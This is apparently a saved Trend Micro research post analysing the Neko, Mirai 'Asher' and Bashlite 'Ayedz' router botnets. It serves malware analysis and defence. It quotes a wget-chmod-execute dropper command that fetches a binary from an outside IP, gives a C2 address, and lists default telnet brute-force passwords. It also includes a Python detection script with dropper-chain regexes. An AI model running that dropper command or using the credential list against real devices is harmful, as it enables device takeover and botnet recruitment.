1/22/2021 Neko, and Bashlite Target Routers, Devices


Malware Neko, Mirai and Bashlite Target Routers, Devices

Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers into botnets that are capable of launching distributed denial of service (DDoS) attacks.

By: Augusto Remillano II, Jakub Urbanec August 13, 2019 Read time: 6 min (1826 words)

Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.

Neko

On July 22, our honeypots detected a botnet sample, x86.neko (detected by Trend Micro as Backdoor.Linux.NEKO.AB), that brute-forces weak credentials. Once logged in, it issues the following commands:

https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… 1/15 1/22/2021 Neko, Mirai and Bashlite Target Routers, Devices

“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”

Our research indicates that this botnet has versions for various processor architectures.

Upon analysis, we discovered that the Neko botnet is capable of executing several backdoor commands: it can execute shell commands as well as launch User Datagram Protocol (UDP) and UDP-HEX flood attacks, overwhelming a router's ability to properly process and respond to traffic.

It is also capable of killing processes (the “killer” function is found in its body). Neko also holds within it an extensive kill list of other malware-related processes that it will terminate.

Further examination of the Neko botnet code shows that it comes with scanners that are capable of looking for multiple exploits that would allow the malware to propagate itself to other vulnerable devices:


- Eir WAN side remote command injection (TR-064) – a wide area network (WAN) side RCE for Eir D1000 routers
- HNAP SOAPAction-Header Command Execution (CVE-2015-2051) – RCE for multiple D-Link routers caused by an error in handling malicious HTTP requests
- Huawei Router HG532 - Arbitrary Command Execution (CVE-2017-17215) – RCE for the Huawei HG532 router caused by improper validation of a configuration file
- GPON Routers - Authentication Bypass / Command Injection (CVE-2018-10561, CVE-2018-10562) – RCE for DASAN GPON home routers caused by authentication bypass and command injection
- Linksys E-series - Remote Code Execution – RCE caused by an unauthenticated OS command injection
- MVPower Shell Command Execution – exploits an unauthenticated RCE vulnerability in MVPower digital video recorders (DVRs)
- ThinkPHP 5.0.23/5.1.31 RCE – RCE for the open-source web development framework ThinkPHP 5.0.23/5.1.31
- Realtek SDK - Miniigd UPnP SOAP Command Execution (CVE-2014-8361) – RCE caused by an unauthenticated OS command injection in devices that use the Realtek SDK with the miniigd daemon

Aside from the abovementioned exploits, we observed that the Neko botnet also scans for vulnerable Africo devices. We are unable to determine which Africo device Neko scans for, and we noted that the scan does not seem to be linked to any specific exploit. However, we noticed that its structure is similar to that of Netgear DGN1000 / DGN2200, an unauthenticated RCE on Netgear DGN devices.


Figure 1. Neko botnet code showing how it scans for Africo devices

On July 29, our honeypots collected an updated Neko botnet sample (detected by Trend Micro as Backdoor.Linux.NEKO.AC). This time, the file is UPX-packed with its magic number (UPX!) tampered, in an attempt to prevent the botnet from being unpacked by standard tooling.

Figure 2. UPX-packed Neko botnet code with an altered magic number

We discovered that this new botnet sample has an expanded scanner function and uses additional exploits for propagation. Interestingly, the list of exploits now includes Netgear DGN1000 / DGN2200 — the vulnerability that shares a similar structure with the Africo scan.


Figure 3. Neko botnet code showing how it scans for Netgear DGN1000 / DGN2200

The updated version of the Neko botnet also scans for multiple CCTV-DVR vendors and for Netgear R7000 and R6400 routers (CVE-2016-6277).

Figures 4 and 5. Neko botnet code showing how it scans for a variety of CCTV-DVR exploits and Netgear R7000 and R6400 routers


This Neko variant also scans for “awsec”, which has a similar vulnerability structure as that of the Vacron NVR RCE.

Figure 6. Neko botnet code showing how it scans for “awsec”

In addition, the Neko botnet also attempts to scan for “cisco” and “wap54g”; however, based on our analysis, both commands are unable to successfully exploit any vulnerability. “Cisco” appears to be attempting to use CVE-2018-15379, wherein the HTTP web server for Cisco Prime Infrastructure has unrestricted directory permissions, allowing RCE. However, the payload does not use the correct URI path, hence the vulnerability is not exploited.

Figure 7. Neko botnet code showing how it scans for “cisco”


Meanwhile, the “wap54g” payload’s HTTP headers and message body were improperly formatted, which may have caused the attempt to exploit the Linksys WAP54Gv3 Remote Debug Root Shell vulnerability to fail.

Figure 8. Neko botnet code showing how it scans for “wap54g”

Mirai variant “Asher”

On July 30, our telemetry revealed another router malware — a Mirai variant (detected by Trend Micro as Backdoor.Linux.MIRAI.VWIRC). Typical of Mirai, this variant infects devices running BusyBox, a software suite for devices with limited resources. It first checks for the presence of BusyBox by executing the "/bin/busybox {any string}" command. If the device’s system responds with "{any string}: applet not found," the bot will proceed with its operation. The malware variant’s authors used the {any string} part to “name” the malware; in this case, they used “Asher.”


Figure 9. Screenshot showing the command that checks for the presence of a BusyBox

The “Asher” variant can infiltrate routers by brute-forcing its way in using the following telnet login credentials:

- 12345
- 2011vsta
- 2601hx
- 4321
- admin
- daemon
- default
- guest
- OxhlwSG8
- pass
- password
- root
- S2fGqNFs
- support
- D13hh[
- synnet
- t0talc0ntr0l4!
- taZz@23495859
- tlJwpbo6
- vizxv
- xc3511
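The three behaviours described so far (the download-chmod-execute chain Neko issues after login, the BusyBox probe and "applet not found" reply that Asher waits for, and logins with passwords from Asher's list) are all visible in a telnet honeypot transcript. The following script is an added detection example, not code from the original post or from Trend Micro; it runs over a constructed transcript that reuses the dropper command quoted above, and flags each of the three patterns.

```python
import re

# Constructed telnet honeypot transcript (sample input, not a real capture).
SAMPLE_SESSION = """\
login: root
Password: xc3511
/bin/busybox ASHER
ASHER: applet not found
cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko
uname -a
"""

# Passwords from the Asher telnet brute-force list quoted in the post.
ASHER_PASSWORDS = {
    "12345", "2011vsta", "2601hx", "4321", "admin", "daemon", "default",
    "guest", "OxhlwSG8", "pass", "password", "root", "S2fGqNFs", "support",
    "D13hh[", "synnet", "t0talc0ntr0l4!", "taZz@23495859", "tlJwpbo6",
    "vizxv", "xc3511",
}

# Mirai-style BusyBox probe ("/bin/busybox <TOKEN>") and the reply the bot waits for.
BUSYBOX_PROBE = re.compile(r"^/bin/busybox\s+(\w+)\s*$")
APPLET_NOT_FOUND = re.compile(r"^(\w+): applet not found\s*$")
# Download, chmod and execute chain of the kind Neko issues after logging in;
# the backreference requires the chmod target to be the file that is then run.
DROPPER_CHAIN = re.compile(
    r"cd\s+/tmp/?\s*;\s*(?:wget|curl|tftp)\s+\S+\s*;\s*chmod\s+[0-7]{3,4}\s+(\S+)\s*;\s*\./\1"
)
PASSWORD_LINE = re.compile(r"^Password:\s*(\S+)\s*$")


def detect(session_text):
    """Return (kind, detail, line_no) findings for a telnet session transcript."""
    findings = []
    pending = {}  # BusyBox probe token -> line number, awaiting the reply
    for n, line in enumerate(session_text.splitlines(), 1):
        if m := PASSWORD_LINE.match(line):
            if m.group(1) in ASHER_PASSWORDS:
                findings.append(("known_botnet_password", m.group(1), n))
        elif m := BUSYBOX_PROBE.match(line):
            pending[m.group(1)] = n
        elif (m := APPLET_NOT_FOUND.match(line)) and m.group(1) in pending:
            # Only the probe/reply pair is reported, at the probe's line number.
            findings.append(("busybox_probe", m.group(1), pending.pop(m.group(1))))
        elif m := DROPPER_CHAIN.search(line):
            findings.append(("dropper_chain", m.group(1), n))
    return findings


if __name__ == "__main__":
    for kind, detail, line_no in detect(SAMPLE_SESSION):
        print(f"line {line_no}: {kind} ({detail})")
```

A probe without the matching "applet not found" reply is deliberately not reported, since that is the case in which Mirai-style bots abandon the device.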

We discovered that Asher propagates by scanning for the following router exploits. We also saw that it shares two similar exploits with Neko:


Figure 10. The exploits Asher botnet scans for

- GPON Routers - Authentication Bypass / Command Injection (CVE-2018-10561, CVE-2018-10562) – RCE for DASAN GPON home routers caused by authentication bypass and command injection
- MVPower Shell Command Execution – an unauthenticated RCE in MVPower DVR TV-7104HE 1.8.4 115215B9 digital video recorders
- Realtek SDK - Miniigd UPnP SOAP Command Execution (CVE-2014-8361) – RCE caused by an unauthenticated OS command injection in devices that use the Realtek SDK with the miniigd daemon

Figure 11. Code showing how the Asher botnet scans for DVRs with the MVPower Shell Command Execution vulnerability

Figure 12. Code showing how the Asher botnet scans for CVE-2014-8361


Figure 13. Code showing how the Asher botnet scans for CVE-2018-10561 and CVE-2018-10562

Bashlite variant “Ayedz”

On August 6, our telemetry pointed to a botnet sample of yet another router malware, this time a Bashlite variant that seems to refer to itself as “Ayedz” (detected by Trend Micro as Backdoor.Linux.BASHLITE.SMJC, Backdoor.Linux.BASHLITE.SMJC8, and Backdoor.Linux.BASHLITE.SMJC4), based on this malware’s file name. Upon execution, Ayedz sends the following information about the infected device back to the host IP address 167[.]71[.]7[.]231 via port 46216:

Figure 14. The commands used by Bashlite variant Ayedz to send information back to its host


- Device – its “getDevice” function returns an “SSH” string if there is a file present at “/usr/sbin/telnetd”; otherwise, it returns an “Uknown Device” string
- Files – whether the device has any of the following files: /usr/bin/python /usr/bin/python3 /usr/bin/perl
- Linux distribution or distro – whether the infected device’s Linux distro is openSUSE, Red Hat Enterprise Linux (RHEL), CentOS, Gentoo Linux, Ubuntu, Debian, or unknown
- Port – its getPorz function returns a “22” string if the four abovementioned files are found; otherwise, it returns an “Uknown Device” string

Analysis of this Ayedz sample revealed that it is capable of running several backdoor commands for launching DDoS attacks. We also observed that Ayedz offers its operators several attack/flood options as well as other commands, such as:

- CLOUDFLARE - HTTP flood with CloudFlare protection bypass
- CNC - set command and control
- HTTP - HTTP flood
- RAID - STD + TCP flood
- STD - STD flood
- STOMP - STD + UDP flood
- STOP - stop bot operation
- TCP – TCP SYN flood
- UDP - UDP flood
- UPDATE - download updated binary from C&C

Securing routers against threats like Neko, Mirai, and Bashlite

Although manufacturers play important roles in securing routers and other devices, users and businesses can adopt good security practices to defend against threats like Mirai, Neko, and Bashlite:

- Choosing a reliable manufacturer that consistently patches its products
- Regularly updating the device’s (e.g., a router’s) firmware and software as well as the credentials used to access it
- Encrypting and securing the connections that devices use
- Configuring the router to make it more resistant to intrusions
- Disabling outdated or unnecessary components in devices and using only legitimate applications from trusted sources
- Deploying tools that provide additional security to home networks and the devices connected to them

Trend Micro solutions

Trend Micro Smart Home Network protects customers from the aforementioned exploits through these rules:

- 1133255 WEB Remote Command Execution in XML -1
- 1059669 WEB D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability (BID-37690)
- 1134287 WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215)
- 1134610 WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561)
- 1134611 WEB Dasan GPON Routers Command Injection -1.2 (CVE-2018-10561)
- 1134891 WEB Dasan GPON Routers Command Injection -1.3 (CVE-2018-10561)
- 1134892 WEB Dasan GPON Routers Command Injection -1.4 (CVE-2018-10561)
- 1058632 EXPLOIT Linksys E-series Unauthenticated Remote Code Execution Exploit (EDB-31683)
- 1054456 WEB Linksys Unauthenticated Remote Code Execution -1 (OSVDB-103321)
- 1054457 WEB Linksys Unauthenticated Remote Code Execution -2 (OSVDB-103321)
- 1133498 WEB Remote Command Execution via Shell Script -1.u
- 1135215 WEB ThinkPHP Remote Code Execution
- 1134286 WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361)
- 1133498 WEB Remote Command Execution via Shell Script -1.u
- 1134286 WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361)
- 1134610 WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561)
- 1134611 WEB Dasan GPON Routers Command Injection -1.2 (CVE-2018-10561)
- 1134891 WEB Dasan GPON Routers Command Injection -1.3 (CVE-2018-10561)
- 1134892 WEB Dasan GPON Routers Command Injection -1.4 (CVE-2018-10561)

Trend Micro™ Deep Discovery™ Inspector protects customers from the mentioned exploits through these rules:

Neko

Payload | Rule
Netgear | Official Rule 2547: NETGEAR DGN1000/DGN2200 Remote Code Execution - HTTP (Request)
Netgear R7064 | Official Rule 4103: Daemon DD-WRT Unauthenticated RCE Exploit - HTTP (Request)
Crossweb | Beta Rule 3268: CCTV-DVR Remote Code Execution – HTTP (Request)
Crossweb | Official Rule 2485: CCTV-DVR Remote Code Execution – HTTP (Request)
Cisco | Official Rule 2452: Wget Commandline Injection
Cisco | Beta Rule 3269: CVE-2018-15379 Cisco Prime Infrastructure Remote Command Execution - HTTP (Request)
Cisco | Official Rule 4168: CVE-2018-15379 Cisco Prime Infrastructure Remote Command Execution - HTTP (Request)
Awsec/Vacron | Official Rule 2543: VACRON Remote Code Execution Exploit - HTTP (Request)
WAP54G | Beta Rule 3270: Linksys Remote Debug Root Shell - HTTP (Request)
WAP54G | Official Rule 4169: Linksys Remote Debug Root Shell - HTTP (Request)

Asher

Payload | Rule
REALTEK | Rule 2575: Command Injection via UPnP SOAP Interface - HTTP (Request)
JAWS | Rule 2544: JAWS Remote Code Execution Exploit - HTTP (Request)
| Rule 2639: CVE-2018-10562 - GPON Remote Code Execution - HTTP (Request)

Ayedz

Rule
Beta Rule 3272: BASHLITE - TCP (Request)
Official Rule 4180: BASHLITE Linux - TCP (Request)

The indicators of compromise (IoCs) are listed in an appendix.

Tags

Network | Research | IoT | Malware | Cyber Threats | Smart Home

Authors

Augusto Remillano II, Threats Analyst

Jakub Urbanec, Threat Researcher


Copyright © 2021 Trend Micro Incorporated. All rights reserved.
